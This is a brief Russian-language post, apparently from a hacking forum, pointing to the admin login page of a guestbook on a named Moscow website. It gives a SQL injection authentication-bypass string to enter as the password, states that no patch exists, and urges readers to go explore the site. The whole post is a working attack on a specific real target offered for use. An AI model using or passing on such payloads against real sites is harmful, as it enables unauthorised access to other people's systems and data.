http://www.spsmoscow.ru/gbook/admin.php

login: 
password:’) OR (‘a’ = ‘a 

Патча для этой уязвимости в данное время нет. Так что вперед изучать. 

Прислал: OPEX



Оставить мнение